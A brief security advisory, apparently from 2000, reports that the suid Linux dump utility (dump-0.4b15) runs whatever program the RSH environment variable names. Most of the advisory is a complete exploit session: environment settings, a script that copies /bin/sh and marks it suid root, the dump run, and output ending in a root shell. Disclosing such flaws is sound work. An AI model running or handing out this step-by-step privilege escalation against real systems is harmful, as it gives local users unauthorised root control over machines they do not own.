Linux dump/restore utilities can be exploited to gain root
------------------------------------------------------------------------

SUMMARY

The Linux dump and restore commands execute an external program with suid
privileges. This fact allows local users to gain root privileges by a simple
modification to the remotely executed shell (RSH parameter).

DETAILS

Vulnerable systems:
dump-0.4b15

Exploit:
$ export TAPE=garbage:garbage
$ export RSH=/home/mat/execute_this
$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
$ chmod 755 /home/mat/execute_this
$ /sbin/dump -0 /
DUMP: Connection to garbage established.
DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
DUMP: Date of last level 0 dump: the epoch
DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
$ ls -la /home/mat/sh
-rwsr-xr-x 1 root tty 316848 Oct 31 14:38 /home/mat/sh
$ /home/mat/sh
bash# id
uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)

--
Eko Sulistiono
MIKRODATA & AntiVirus Media
Web: http://www.mikrodata.co.id/
WAP: http://www.mikrodata.co.id/wap/index.wml
